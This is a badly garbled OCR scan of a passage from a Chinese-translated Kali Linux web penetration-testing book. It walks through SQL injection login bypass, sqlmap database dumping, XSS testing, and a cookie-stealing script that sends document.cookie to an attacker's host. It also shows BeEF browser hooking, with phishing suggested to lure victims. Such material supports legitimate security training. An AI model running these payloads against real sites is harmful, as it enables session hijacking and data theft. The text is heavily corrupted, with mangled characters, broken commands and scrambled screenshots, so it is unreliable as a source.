« by: MICHAGIL X AVAR 
HACKBART* 


在 下 面 的 例子 中 ， 我 们 会 尝试 在 网 站 DrChaos.com 上 进行 SQL 注入 。 我 们 先 在 Kali 服 务 器 控 


制 台 上 用 Firefox 打 开 www.DrChaos.com ， 并 尝试 登录 该 网 站 。 首 先 ， 我 们 尝试 用 用 户 名 
administrator 和 和 俭 人 码 12345 来 登录 。 登 录 不 会 成 功 。 


这 时 ,进入 Firefox 的 View 荣 单 栏 ,选择 HackBar 荣 单 . 点 击 Load URL 按 钮 ,并 点 击 Enable Post 
data 按 钮 。 你 会 看 到 我 们 要 登录 的 URL 以 及 刚刚 尝试 的 用 户 名 和 密码 。 


| INT v|* e SQLv XSSv Encryptionv Encodingv Otherv 
gy Load URL 

Ü Split URL 

«| Execute 


Enable Post data C Enable Referrer 
Post data | sian ean ae 


imini b » E I awe rio] TE 


现在 我 们 来 在 用 户 名 adaministrator 后 面 加 一 个 单 引号 。 就 在 我 们 点 击 Execute 按 钮 后 ,我 
们 收 到 了 一 个 SQL 注入 。 这 说 明 服 务 融 可 能 是 有 SQL 注入 的 漏洞 的 , 因为 服务 条 返回 了 SQL 错误 。 
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INT T | =. SQLT X557 Encryptont Encodingy Other? 
mj Load URL | 
& Split URL 

Execute 


Enable Post data Ci Enable Referrer 
Post data | 


Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for 
the right syntax to use near '827ccb0eea8a706c4c34a168911841e7b" at line 1 

Error No: 1064 

SELECT * FROM user WHERE username = 'administrator" AND password = 
'827cchüeeaBa706c4c34al16891184e7b' 


我 们 在 该 行 尾部 添加 一 个 oR 121 ## 语 句 来 添加 一 个 SQL 注入 。 


Enable Post data | Enable Referrer 


i 


执行 代码 后 ， 我 们 就 以 管理 员 里 份 登录 到 www.drchaos.com。 


Dashboard 


Welcome to WordPress! 


fia 一 mm mpm | pum By pe P 4 nami pu 
We've assembled some links to get you started 


Gel Started Heat Steps 


2 a Welle your first biog posl 
Comments (Gustomine Your Site 
vo Add an Aboul page 


zi Faedbaciks 


cr, changg your theme completghr = Mww your gite 
11 Appearance 


* Plugins 


j Users 


Right Naw Quick Press 


Content 


pats Discussion 
T? Settings 
: 65 Poss li Comment 
; kgs Adj Medin 
: zm ! 2 Pages Q Approved 
Q Categorias 0 Pending 


31 Tags 2 Spam 
Theme TechBlog [Mutipie Pro Version] with B Widgets 
You are uting WordPress 3.5.1. 


Assume] huis protected your site tron 21 spam commas aired. 
There are 2 comments in your spam queue nghi now. 


54 SQL 注入 167 


我 们 已 经 给 www.DrChaos.com 打 了 补丁 ,所 以 这 种 攻击 对 它 已 经 没 用 了 。 不 过 , 你 能 看 到 SQL 
注入 对 攻击 来 说 非常 有 用 , 因为 它们 能 为 Web 渗 透 测 试 人 员 提 供 一 个 获得 系统 的 全 部 权限 的 简便 
Fie 

SQL 注入 是 否 成 功 取决 于 攻击 者 对 SQL 命令 的 理解 。 如 果 你 需要 温习 一 下 SQL 技能 ， 我 们 建 
议 你 看 看 位 于 http:/www.w3schools.comysqlsql intro.asp 的 W3 学 院 SQL 教 程 。 


sqlmap 


sqlmap f JHF Ba thrill AAA SQL 23A till at FEW E HER o sqlmap H tH 
了 一 个 检测 引擎 ,以 及 大 量 的 渗透 测试 功能 ,从 数据 库 指 纹 到 访问 底层 文件 系统 和 在 操作 系统 上 
通过 市 外 连接 执行 命令 。 

功能 还 包括 对 通用 数据 库 管 理 系统 的 文 持 、 对 许多 SQL 注入 技术 的 文 持 、 枚 举 用 户 、 密 但 散 
AJ, 以 及 许多 其 他 功能 。sqlmap 也 文 持 通过 Metasploit 的 Meterpreter 的 getsvstem 命 令 来 对 数据 库 
的 用 户 特 权 进 行 提 权 。 


sqlmap 是 一 个 可 对 数据 库 服务 器 进行 利用 的 Kali 内 建 工 具 。 要 使 用 sqlmap ， 你 需要 将 该 工具 
指 癌 Web 服 务 估 上 有 个 调用 SQL 的 脚本 的 URL。 这 些 都 能 辨别 ， 因 为 它们 通 稼 会 在 URL 中 市 php。 


Ay n] LAN w Vulnerability Analysis > Database Assessment > sqlmap。 它 会 打开 个 终端 窗口 来 
显示 sqlmap 的 帮助 信息 o 


使 用 sqglmap 的 基本 语法 格式 为 : 
sqlmap -u URL --function 
有 个 常用 的 功能 是 的 dbs。dbs 关 键 字 会 让 sqlmap 获 取 数 据 库 。 


sqlmap -u http://www.drchaous.com/article.php?id=5 --dbs 


你 能 从 我 们 的 结果 中 看 出 我 们 已 经 有 知 干 找到 的 数据 库 了 。 在 这 个 例子 中 , 我 们 会 将 精力 集 
中 在 test 数 据 库 上 。 


找到 了 有 漏洞 的 Web 服 务 大 之后， 你 可 以 通过 使 用 -D 命 令 和 数据 库 的 名 称 来 选择 数据 库 。 
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sqlmap -u http://www.drchaos.com/article.php?id=5 -D test --tables 
tables 关 键 字 用 于 取得 我 们 的 Web 服 务 器 上 test 数 据 库 中 的 所 有 表 。 我 们 能 看 到 ， 我 们 已 
经 成 功 获 取 了 两 张 表 admin 和 content。 


调用 如 下 命令 后 ，sqlmap 会 显示 所 有 的 表 : 
sqlmap -u http://www.drchaous.com/article.php?id=5 -D test --tables 


特定 行 也 可 用 如 下 命令 来 选择 : 


sqlmap -u http://www.drchaous.com/article.php?id=5 -T tablesnamehere 
--columns 


如 采 在 表 中 有 任何 相关 信息 ， 你 可 以 用 如 下 命令 来 搜索 : 


sqlmap -u http://www.drchaous.com/article.php?id=5 -T tablesnamehere -U 
test --dump 


-U test -dump 


它 会 创建 一 个 名 为 test 的 文件 ， 然 后 将 数据 库 表 中 的 所 有 原始 数据 都 转 存 到 那个 文件 中 。 许 
多 情况 中 ， 这 些 信息 包括 密码 和 其 他 敏感 信息 。 


5.5 ” 跨 站 脚本 (XSS) 


路 站 脚本 是 Web 应 用 中 出 现 的 一 个 漏洞 。XSS 人 允许 攻击 者 向 网 站 注 和 脚本。 这些 脚本 可 用 于 
修改 Web 服 务 肯 ， 或 是 影响 连接 到 该 Web 服 务 郁 的 用 户 。 

路 站 脚本 占 了 篆 见 的 基于 Web 的 攻击 中 的 绝 大 多 数 。 许 多 时 候 ， 当 我 的 团队 被 客户 有 要求 检查 
已 被 侵入 的 丢失 了 数据 的 Web 服 务 侣 ,结果 都 是 跨 站 脚本 攻击 造成 的 结果 。 跨 站 脚本 攻击 使 得 攻 
击 者 可 以 在 网 站 上 浴 获 、 将 恶 章 软件 分 发 给 客户 兽 ， 并 从 网 站 急 取 敏感 信息 ， 如 信用 卡号 和 其 他 
个 人 可 识别 信息 。 

一 个 用 于 检查 跨 站 脚本 源 洞 的 方法 是 检查 输入 字段 ,如 搜索 框 ， 是 否 有 源 洞 。 有 个 用 于 测试 
网 站 上 的 输入 字段 的 例子 是 使 用 人 简单 的 搜索 字符 串 ， 如 下 : 


CHAOS<script>alert ('www.DrChaos.com' ) </script> 
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你 可 以 用 前 面 的 脚本 测试 任何 网 站 , 不 过 , 我 们 不 建议 在 碰 到 的 每 个 网 站 中 都 输入 这 个 字符 
捉 ， 因 为 它 会 引起 目标 对 你 的 恶意 企图 的 注意 。 如 果 你 决定 使 用 一 个 类 似 的 脚本 来 测试 跨 站 脚本 
漏洞 ， 请 确保 在 脚本 中 用 的 是 其 他 网 站 ， 而 不 是 www.DrChaos.com。 


5.6 测试 蹈 站 脚本 


谷歌 创建 了 Gruyere 项 目 ， 并 以 此 作为 测试 Web 应 用 漏洞 利用 和 防御 的 一 个 途径 。Gruyere 项 
目的 网 站 也 签 入 了 右 干 汤 洞 ,其 中 包括 XSS。 你 可 以 目 己 运行 线 上 的 Gruyere 项 目 , 或 者 你 也 可 以 
将 它 下 载 到 本 地 用 作 测 试 。 


f = Web Application Exploits and Defenses 


A Codela iy Bruce betes, Mugeha Bendre, and Parisa Tabra 


我 们 登入 了 目 己 的 Gruyere 之 后 ， 就 能 将 之 前 的 字符 串 复制 到 usermame 输 入 字段 ， 并 点 击 
Submit 按 钮 。 下 面 的 稚 图 显示 的 是 显示 了 cHAOS 脚 本 的 Gruyere 主 页 。 


在 输入 字段 输入 的 字符 串 如 下 : 


CHAOS<script>alert ('www.DrChaos.com' )</script> 


Hama | My Solopots | New Snippet ! Upiaad CHAOS<scripteale <CHAGS 
aa B." 
* 


我 们 在 用 户 名 输入 字段 运行 了 XSS 脚 本 后 ， 应 该 能 看 到 有 些 代 码 页 显示 在 网 站 上 了 。 这 时 ， 
我 们 就 能 在 网 站 上 一 看 到 用 户 名 时 生成 一 个 警报 弹 窗 。 


wWwwDrChaos.com 


除 此 之 外 ，http://xss.progphp.com/ 是 男 一 个 测试 XSS 攻 击 和 脚本 的 流行 站 点 。 你 也 可 以 写 一 
些 脚本 ， 将 他 们 输入 到 网 站 中 ， 看 看 XSS 会 如 何 跟 网 站 和 你 目 己 的 Web 浏 览 厅 安 全 地 交互 。 
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5.7 XSS cookie 资 取 /身份 认证 劫持 


脚本 小 子 可 能 会 用 XSS 来 生成 警报 弹 宿 ， 不 过 ， 作 为 专业 渗透 测试 人 员 ，XSS 的 真实 价值 在 
于 获得 访问 系统 的 特权 。 下 一 节 我 们 将 会 介绍 如 何 做 。 如 果 你 没有 这 么 做 过 , 那么 在 线 创建 一 个 
日 己 的 Gruyere 实 例 来 测试 下 节 中 介绍 的 概念 。 


访问 http://google-gruyere.appspot.com/start， 合 歌 应 用 引擎 会 创建 一 个 新 的 Gruyere 实 例 ， 并 
分 配 一 个 唯一 ID， 将 你 重 定 癌 回 http://google-gruyere.appspot.com/123456/( 其 中 123456 是 这 个 例 
于 中 的 唯一 ID )。 

Gruyere 的 每 个 实例 都 是 跟 其 他 实例 完全 分 离 的 ， 所 以 你 的 实例 不 会 被 其 他 也 在 使 用 Gruyere 
的 用 户 影 响 。 你 需要 用 你 目 己 的 唯一 ID 和 蔡 换 掉 所 有 例子 中 的 123456。 

如 采 你 想 跟 其 他 人 分 于 在 Gruyere 上 完成 的 工作 和 项 目 ( 比如 ， 癌 他 们 展示 一 次 成 功 攻 击 )， 
将 市 有 你 的 唯一 ID 的 完整 链接 发 给 朋友 即 可 。 

不 要 在 Gruyere 账 户 上 用 你 在 其 他 真实 服务 中 用 到 的 密码 。 

举 个 通过 XSS 漏 洞 来 历 取 会 话 cookie 的 例子 。 如 果 要 在 本 地 网 络 上 使 用 此 技术 ， 你 的 Kali 
实验 台 和 市 有 漏洞 的 Web 服 务 融 必须 能 够 相互 通信 。 由 于 我 们 使 用 的 是 Gruyere 项 目 ， 需 要 给 Kali 
Linux 实 验 台 分 配 个 公 网 PP 地址 ， 放 到 因特网 上 。 这 样 Kali Linux 就 能 跟 目标 Gruyere 服 务 器 正常 通 
fat 


通常 ， 给 Kali Linux Ba— 4-Z- PLIP2 5E E RAW BK, PTR 
re 味 着 你 撤 开 了 防火 墙 ， 将 Kali Linuxi& A T ARAE. 


在 登录 Gruyere 时 ， 点 击 屏幕 右上 方 的 Sign up 按钮 ， 创 建 一 个 用 户 名 ， 如 下 方 截图 所 示 : 


( eruyere: Sign up 


Sign up for a new account. 


Sign in! Sign up 


Username: | 


Password: 
WARNING: Gruyere is not secure. 
Do not use a password that you use for any real service. 
Do not upload any personal or private data. 


Create account 
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在 这 个 练习 中 ， 我 们 会 创建 两 个 分 离 的 账户 。 让 我 们 先 用 第 一 个 账户 登录 。 在 这 个 例子 中 ， 
我 们 的 第 一 个 账户 名 为 TheDuge。 下 一 步 ， 跳 到 代码 片段 部 分 , 创建 一 个 新 的 代码 片段 。 我 们 会 
在 这 里 输入 XSS 脚 本 ， 如 下 方 的 截图 所 未 : 


Add a new snippet. 


src='http://kali.drchaos.com/var/www/xss_lab/lab_script.php?"+docu 
ment.cookie+"'>")</script 


Limited HTML is now supported in snippets (e.g., <b>, Submit | 
<i>, etc.)! 


我 们 知道 Gruyere 内 含 XSS 源 洞 ， 所 以 会 在 这 里 调用 脚本 。 在 现实 环境 中 , 我 们 会 对 目标 网 站 
使 用 同样 的 脚本 来 测试 它 是 否 含有 XSS 汤 洞 。 举 个 例子 ， 如 果 我 们 知道 Facebook 的 中 间 名 学 字段 有 
可 以 被 XSS 攻 击 利用 的 汤 洞 ， 攻 击 者 就 需要 创建 一 个 个 人 档案 ,并 将 这 个 脚本 用 作 中 间 名 。 


Facebook 对 这 种 攻击 方式 的 漏洞 利用 是 免疫 的 。 这 里 只 是 个 假设 的 例子 。 


<script>document.write("<img src='http://kali.drchaos.com/var/www/xss_ 
lab/lab_script.php?"+document.cookie+"'>")</script> 


虽然 在 你 输入 该 命令 时 它 可 能 会 在 显示 上 自动 换行 ,但 它 必须 以 单条 命令 的 
形式 输入 。 


这 只 是 可 用 于 对 有 漏洞 的 系统 进行 漏洞 利用 的 诸多 脚本 中 的 一 个 。 本 书 的 重点 是 利用 Kali 
Linux 中 的 工具 ， 不 过 ， 顶 尖 的 渗透 测试 人 员 会 使 用 行业 中 可 用 的 类 如 Kali Linux 的 各 种 工具 ， 以 
及 各 种 定制 工具 , 如 攻陷 目标 的 XSS 脚 本 。 我 们 建议 你 利用 Gruyere 目 标 实 例 来 继续 研究 本 话题 和 
测试 新 的 攻击 脚本 ， 藉 此 来 掌握 构建 和 执行 定制 脚本 攻击 的 能 
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Kali Linux 中 还 带 有 一 些 符 合 本 章 主 题 的 其 他 工具 。 


5.8.1 urlsnarf 


urlsnarfzé — 3X H]2E T4 Pr YEHTTP INI 28 Z4 35 PRIREJA KURL A 8 8 54 X, (CLF, 
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Common Log Format， 几 乎 所 有 Web 服 务 器 都 在 用 的 日 志 格 式 ) 输出 的 工具 ， 适 用 于 你 要 用 偏好 
的 Web 日 志 分 析 工 具 ( analog、wwwstat 等 ) 对 其 进行 离线 后 期 处 理 的 情况 。 


要 访问 urlsnarf， 你 可 以 浏览 Sniffing/Spoofing > Network Sniffers, *</qvé#furlsnarf, t 
弹出 一 个 终端 显示 该 工具 的 选项 信息 ， 如 下 方 的 截图 所 示 : 


root@kali: ~ 


File Edit View Search Terminal Help 


Version: 2.4 
Usage: urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression] ] 


:~# 国 


要 使 用 urlsnarf， 输 入 urlsnarf -1 和 你 要 监测 的 网 卡 。urlsnarf 会 显示 它 正 处 于 监听 状态 。 
下 面 的 截图 显示 的 是 urlsnarf 正 在 监听 eth0: 


Usage: urlsnarf [-n] [-1 interface | -p pcapfile] [[-v] pattern [e 
-~# urlsnarf -i ethO 
urlsnarf: listening on ethO [tcp port 80 or port 8080 or port 3128] 


urlsnarf 会 显示 一 份 它 监测 到 的 所 有 线 上 URL 请 求 的 转 存 。 举 个 例子 , 一 个 Windows 用 户 访问 
了 www.thesecurityblogger.com。urlsnart 中 会 显示 所 有 URL 请 求 ， 以 备 后 用 。 


b./6.178 - - (13/May/2013:10:12:38 mM "GET MR If om ond. delen Ma 

'v9/1/windowsupdate/b/sel fupdate/WSUS3/x86/0ther/ 3 

1.1" - - “-" “Windows -Update-Agent" 

b .76.128 - - [ 13/May/2013: 10:12:58 -0400] "GET http:, re dpi La 

fF HTTP/1.1° - - “-" “Mozilla/5.G (Windows NI 3.1) A DL WoLKIt /5 .36 (KHTML 
ike Gecko) Chrome/27.0.1453.94 Safari/537 .36' 

?.16./6.128 - - [13/May/2013:10:12:52 -0400] “GET https www.thesecurityblogge 
r.com/wp-content/plugins/gd-star-rating/css/gdsr.c ohp?te 1356285241 4s=a05i05mz 
6k20c05r0532312 116202430462312162624324032351 pchristmas&23s pc rystal%23s Ipdarkne 
ss*23slpoxygen*23slgoxygen gif*23slpplain*23slppumpkin*23slpsoft*23slpstarratinc 
$*23slpstarscapes23tlpclassical*23tlps tarrating'*e2 3tlgstarrating gif*23lsgflower&c 
-off&verz1.9.22 HTTP/1.1" - - '"http://www.thesecurityblogger com "Mozilla/5.0 
(Windows NT 5.1) AppleWebKit/53/.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safe 
ri/537.36" 
172.16.76.128 - - [13/May/2013:10:12:52 -0400] "GET http://www. thesecurityblogge 
r.com/wp-content/plugins/captcha/css/style.css?verz3.5.1 HTTP/1.1" - - "http://v 

abris OY pes COmA 人 (Windows NT 5.1) AppleWebkKit/53/.36 (Kk 
TML, / 3.94 /537.36" 
| 10:12:52 -0400] "GET http://stats. vibe v com/e 
- "typ //www.thesecurityblogger.com/” /"Mozilla/5.@ oles 
pu" ‘537.36, [KHIML, Like) Gecko) »Chrnome/2/,@0.1453.94 Safari/ 


172. 16.76.128 - - cin the Rabe yop: -0400] “GET WPM E eae ooi pud 


tion.com/pagead/show_ads.js HTTP/1.1" - - "http://www. r.com/ 
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5.8.2 acccheck 


acccheck E — IR HI TH., EY A se 1 HSMBEMNHA B Windows 13A lE; acccheck 
是 对 smbclient 二 进 制 文件 的 一 个 脚本 封装 ， 因 此 ， 它 的 执行 过 程 会 依赖 smbclient。 


9.0.3 hexinject 


hexinject 是 一 球 通 用 数据 包 注 入 工具 和 嗅 探 工具 。 它 提供 了 一 个 用 于 原始 网 络 访问 的 命令 行 
框架 。hexinject 锌 设计 成 了 跟 其 他 命令 行 工 具 一 起 使 用 ， 因 此 它 能 加 速 创建 可 读 性 好 的 强大 shell 
脚本 的 过 程 ， 并 以 透明 的 方式 来 拦截 和 修改 网 络 数据 。hexinject 可 以 将 任何 东西 注入 到 网 络 中 ， 
也 能 用 于 计算 校 验 和 和 TCP/P 协 议 的 数据 包 大 小 字段 。 


5.8.4 Patator 


Patator 是 一 坎 多 用 途 骏 力 破 解 工 具 ， 它 被 设计 成 模块 化 的 结构 ， 使 用 方便 。Patator 的 功能 
括 暴力 破解 FTP、SSH、Telnet、SMTP 、HTTP/HTTPS、POP、IMAP、LDAP、SMB MSSQL., 
Oracel、MySQL 、DNS 、SNMP 和 密码 文件 。 


9.8.5 DBPwAudit 


DBPwAuditn] Ltr tha T PREE | EA RS Jot e EZ TP KT AIT MI SIL 
他 的 数据 库 驱 动 程序 ， 只 要 将 新 的 JDBC 驱 动 复制 到 JDBC 目 录 即 可 。 
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对 号 份 认 证 进行 攻击 允许 攻击 者 扮 作 已 通过 认证 的 用 户 。 在 对 Web 应 用 进行 渗透 测试 时 这 种 
方法 非 第 有 用 ， 因 为 拥有 已 认证 用 户 的 访问 权限 意味 痢 你 已 经 绕 过 了 最 传统 的 安全 防御 系统 。 


本 章 痢 重 介 绍 了 攻击 用 户 和 系统 如 何 进 行 丑 份 认证 。 首先 , 我 们 概要 地 介绍 了 用 于 确认 刁 份 
的 不 同方 法 。 之 后 介绍 了 对 管理 身份 认证 会 话 过 程 的 攻击 。 其 后 义 通 过 对 cookie 管 理 进 行 攻击 ， 
介绍 了 会 话 数 据 是 如 何在 用 户 的 浏览 兹 中 存储 的 。 然 后 我 们 介绍 了 如 何 通 过 各 种 方式 的 中 间 人 攻 
击 技术 来 隐藏 在 目标 中 间 ， 以 便 和 截获 身份 认证 会 话 。 最 后 两 节 评 估 了 Web 应 用 服务 器 的 身份 认证 
漏洞 ， 比 如 SQL 注入 和 鉴 站 脚本 。 


下 一 章 将 介绍 对 服务 器 和 客户 端的 远程 攻击 或 基于 Web 的 攻击 。 


Web 攻 击 


本 章 重 点 讨论 基于 因特网 的 攻击 。 公 司 的 安全 管理 员 一 般 都 知道 因特网 上 有 一 些 亚 意 和 群体， 
他 们 会 持续 不 断 地 寻找 对 网 络 进行 闯 透 的 方式 。 作 为 防御 ,管理 员 要 采取 一 些 安全 措施 , f LAY 
包括 防火 墙 、IPS/IDS、 基 于 主机 的 安全 产品 ( 如 反 病 毒 程序 )、 内 容 过 滤 天 等 。 过 去 ， 这 些 防御 
方式 还 足够 用 ， 不过， 现今 威胁 已 经 变 得 越 来 越 复 森 ， 其 至 能 绕 过 商业 安全 产品 或 “COTS” 安 
全 解决 方案 。 本 半 介 绍 的 工具 会 包 仿 Kali Linux 中 的 方法 ， 用 于 绕 过 位 于 远程 位 置 的 标准 安全 防 
御 指 施 。 


本 章 将 把 渗透 测试 人 员 攻击 工具 集中 的 工具 介绍 完 。 通 过 前 几 章 的 学 习 , 你 应 该 已 经 懂得 如 
何 完成 对 目标 的 侦察 ， 找 出 服务 器 端 和 客户 端的 漏洞 ， 以 及 如 何 对 它们 进行 漏洞 利用 了 。 本章 将 
会 介绍 将 Web 应 用 用 作 前 端的 情况 下 的 最 后 一 类 攻击 。 此 外 ， 我 们 还 会 探索 如 何 利用 Web 服 务 器 
自身 来 通过 漏洞 利用 危害 Web 应 用 ， 比 如 浏览 器 漏洞 利用 攻击 、 代 理 攻击 和 密码 搜集 。 我 们 还 会 
介绍 如 何 使 用 拒绝 服务 攻击 技术 来 中 断 服务 。 


6.1 浏览 器 漏洞 利用 框架 (BeEF) 


二 已 蕊 请 


浏览 融 漏洞 可 能 会 被 各 种 恶意 软件 利用 , 算 改 浏览 各 的 预期 行为 。 这 些 漏洞 都 是 常见 的 攻击 
路 径 ， 因 为 大 多 数 主 机 系统 都 会 用 到 某 种 形式 的 Web 训 览 套 应 用 。 让 我 们 一 起 看 一 个 用 于 利用 浏 
览 硕 漏洞 的 流行 工具 。 

有 许多 很 酷 的 渗透 测试 应 用 程序 可 以 添加 到 你 的 黑客 攻击 兵 套 库 中 , 比如 我 们 最 喜欢 的 工具 
之 一 ， 浏 览 器 漏洞 利用 框架 (BeEF, Browser Exploitation Framework )。BeEF 是 一 个 基于 浏览 用 
的 漏洞 利用 包 ， 它 会 “ 钩 住 ” 一 个 或 多 个 浏览 套 作 为 发 起 攻击 的 滩头 堡 。 攻 击 者 可 以 通过 让 用 户 
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ViluJ.—4 XE HURL AREER, FP A A Ze HER Web STA, uet AE Y HJ 
会 话 。BeEF 绕 过 了 网 络 安全 部 署 和 基于 主机 系统 的 反 病 毒 程序 ， 它 瞄准 的 是 篆 见 浏览 器 中 找到 
的 漏洞 ， 比 如 IE 和 Firefox 浏 览 侠 。 

BeEF 并 没有 包含 在 Kali Linux 的 1.0 发 布 版 本 中 ， 但 可 以 在 beefproject.com 网 站 上 下 载 。 我 们 
期 望 BeEF 可 以 凭借 它 在 渗透 测试 社区 中 的 流行 度 加 入 到 Kali Linux 的 未 来 某 个 版 本 中 ”。 


要 安装 BeEF， 以 root 用 户 刁 份 打 开 Kali Linuxz 上 的 命令 行 终端 ， 调 用 如 下 命令 : 


Q apt-get update 
L] apt-get install beef-xss 


:~# apt-get updatel 


在 运行 apt-get update 命令 时 ， 它 可 能 会 询问 你 是 否 要 安装 、 更 新 或 是 履 盖 某 些 旧 文 件 。 
大 多 数 情况 下 ， 你 只 要 接受 默认 提示 即 可 。 当 更 新 过 程 结束 时 ， 你 可 以 用 apt-get 来 安装 BeEF: 


:~# apt-get install beef-xss 


该 过 程 结 束 时 ， 你 就 已 经 在 Kali Linux 284 f BeEF. 


要 启动 BeEF , 你 需要 切换 到 /usrshare/beef-xss 目 录 , 并 输入 . /peeft 来 启动 BeEF 服 务 器 。BeEF 
服务 器 启动 后 ， 用 于 管理 BeEF 及 钓 住 受害 者 的 URL 会 显示 在 终端 窗口 中 : 


root@kali: /usr/share/beef-xss 


File Edit View Search Terminal Help 

:/usr/share/beef-xss# pwd 
/usr/share/beef-xss 

:/usr/share/beef-xss# ./beef 

7:31:02) Bind socket [imapeudoral] listening on [0.0.0.0:2000]. 
31:02) Browser Exp .oitation Framework (BeEF) 0.4.4.5-alpha 
31:02] Twit: @beefproject 
31:02) Site: h:tp://beefproject.com 
31:02] | Blog: h:tp://blog.beefproject.com 
31:02) | Wiki: h:tps://github.com/beefproject /beef /wiki 
31:02] Project Creator: (@WadeAlcorn) 
31:02] BeEF is loading. Wait a few seconds... 
31:02] 10 extensions enabled. 
171 modules enabled. 
2 network interfaces were detected. 
running on network interface: 127.0.0.1 
| Hook URL: http://127.0.0.1:3000/hook.js 
|. UTI URL: http://127.0.0.1:3000/ui/panel 
running on network interface: 172.16.86.144 
| Hook URL: http://172.16.86.144:3000/hook.js 
| UTI URL: http:/7172;16 .86 .144 330007 ui/panet 
RESTful API key: af26cada016e8d7e0ad54a8d980080a3348d8c 44 
HTTP Proxy: http://127..0..0..1::6789 
BeEF server started (press control«c to stop) 
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(D Kali Linux 1.0.5 (译本 书 时 的 最 新 版 本 ) 中 是 带 有 BeEF 的 。 你 可 以 浏览 Exploitation Tools > BeEF XSS Framework, 
选择 beef 来 启动 。 一 一 详 者 注 
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要 访问 管理 服务 人 各， 打开 一 个 Web 浏 览 硕 ， 访 问 /upanel 链 接 。 在 将 受害 者 引 问 BeEF 的 钓 子 
时 ， 将 受害 者 重 定 加 到 BeEF 服 务 豆 的 钩子 链接 上 ， 即 hook.js。 你 需要 找到 一 个 策略 来 让 受害 者 
访问 你 的 钩子 链接 ， 如 钓鱼 或 是 社会 工程 学 攻击 ， 总 之 是 要 将 用 户 重 定 加 到 BeEF 上 。 


在 这 个 例子 中 , 我 们 会 访问 http://172.16.86.144:3000/ui/panel。 默认 的 用 户 名 和 密码 都 是 beef。 


Authentication 


Username: 


Password: 


当 用 户 点 击 “hook.js” 或 是 重 定 向 回 “hook.js” 网 站 时 ，BeEF 服 务 器 上 的 攻击 者 会 看 到 钧 
住 的 浏览 莫 。BeEF 会 将 该 新 系统 添加 到 目标 列表 中 ， 当 被 钓 住 的 受害 者 在 线 时 ， 将 他 们 显示 出 
来 。 当 离线 受害 者 再 次 连接 到 因特网 上 时 ， 他 们 就 会 成 为 可 被 攻击 的 对 象 , 如 果 他 们 在 重新 使 用 
因特网 前 访问 过 钓 子 链接 。 下 一 个 截图 显示 的 是 BeEF 的 主 界面 以 及 可 用 于 向 被 钓 住 的 系统 发 起 
攻击 的 选项 : 


@ ue Sate - 


10.7.28.198 


Module Results History 
Wd- date lace! 


c 2912-12-12 10-10 command 1 
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前 面 的 例子 显示 了 一 个 被 钓 住 的 Windows 笔 记 本 。BeEF 可 以 显示 细 市 信息 ， 比 如 受害 者 使 
用 的 是 否 是 Firefox、Windows 32 系 统 、 特 是 的 浏览 套 捅 件 、 脚 本 等 ， 以 及 是 否 局 用 了 Java 等 其 他 
有 用 信息 。 攻击 者 可 以 在 被 钓 住 的 机 右上 执行 命令 ， 比 如 弄 出 一 个 钟 声 、 抓 取 会 话 cookie、 截 屏 、 
记录 按键 信息 , 其 至 用 被 钓 住 的 浏览 帮 作 为 攻击 其 他 系统 的 代理 。 男 一 个 例子 是 用 被 钓 住 的 系统 
登录 到 Facebook 上 ,使 用 BeEF 来 捕 提 会 话 cookie。 攻 击 者 可 以 回复 已 通过 和 与 份 认证 的 会 话 ， 获 得 
受害 者 Facebook 账 户 的 全 部 访问 权限 。 中 和 恶 和 破坏 的 可 能 性 是 了 无 止境 的 。 这 个 滩头 堡 可 以 允许 
攻击 者 不 受 限 制 地 访问 用 户 的 浏览 大 以 及 获得 拿 到 访问 权限 所 需 的 所 有 信息 。 


BeEF 会 提供 被 钧 住 系统 的 细 记 信息 ， 并 记录 被 执行 的 命令 。 各 个 独立 主机 的 详情 和 成 功 执 
行 的 命令 的 日 志 信 息 都 会 被 复制 到 一 个 最 终 的 可 交付 的 报告 中 : 


Details Logs Commands Rider 


Type Event 
Event O.CO3s - [Focus] Browser has regained focus. 
Event 3./69s - [Blur] Browser has lost focus. 


Zombie 127.0.0.1 just joined the horde from the domain: 127 .0.0.1:3000 


Hooked Browsers 
4) Online Browsers 
4C312700.1 Details Logs Commands Rider 
? Mà 8B 7001 
C Offline Browsers 


Getting Started Logs Current Browser 


3 Category: Browser (13 Items) 
Browser Name: UNKNOWN 

Browser Version: UNKNOWN 

Browser UA String: Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/2 1.0 
Browser Plugins: Gnome Shell Integration 
Window Size: Width: 994, Height: 510 
Java Enabled: No 

VBScript Enabled: Ho 

Has Flash: Yes 

Has GoogleGears: Ho 

Has WebSockets: Yes 

Has Actives: Ho 

Session Cookies: Yes 


Persistent Cookies: Yes 


3 Category: Hooked Page (5 Items) 


SE V a HJ TRAE E PRE o Toce] BE c E PIA ET e EJ CLE DE SET 81] 
Km, HTETI, HEH rovs HüjFlashflJavas. HAR, ene eel Ay LA SEF AN 
的 威胁 的 安全 解决 方案 可 以 多 提供 一 层 安 全 加 固 ， 如 下 一 代入 侵 防 御 系 统 (NGIPS Next 
Generation Instrusion Prevention System )。 如 BeEF 等 渗透 工具 的 大 多 数 受害 者 都 是 点 击 了 伪装 成 
可 信 团 体 的 邮件 或 社交 媒体 访客 中 的 链接 的 用 户 ， 而 实际 上 这 些 链 接 都 是 用 恶意 链接 、 软 件 或 代 
公 等 包装 过 的 。 
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6.2 FoxyProxy (Firefox 插件 ) 


如 果 你 计划 使 用 代理 如 Zed 攻 击 代 理 (ZAP, Zed Attack Proxy ) 或 BURP 来 测试 Web 应 用 , 你 
可 能 要 用 Firefox 的 插件 FoxyProxy 来 简化 它们 之 间 的 切换 以 及 启用 代理 的 使 用 。 FoxyProxy 是 一 球 


Firefox 扩 展 ， 它 允许 你 轻松 地 管理 、 修 改 、 局 用 或 禁用 Firefox 上 的 代理 设置 。 你 可 以 从 Firefox 扩 
展 库 中 下 载 FoxyProxy。 


安装 好 FoxyProxy 后 ， 它 会 在 Firefox 浏 览 剖 窗口 的 项 部 添加 一 个 图 标 。 点 击 该 图 标 可 以 打开 
FoxyProxy 的 选项 窗口 : 


FoxyProxy Standard 


Select Mode: | Completely disable FoxyProxy 


| 
Grn a Proxy Subscriptions || Pattern Subscriptions |) Global Settings “6 QuickAdd | AutoAdd 


= Logging | 


Enabled Color 


Proxy Name 


Proxy Notes R 
Default 


4 Move Up 
These are the settings that are used... 


P Move Down 


| fij Add New Proxy | 


B ca i 
ee Edit Selection 
S Copy Selection 


ret Delete Selection 


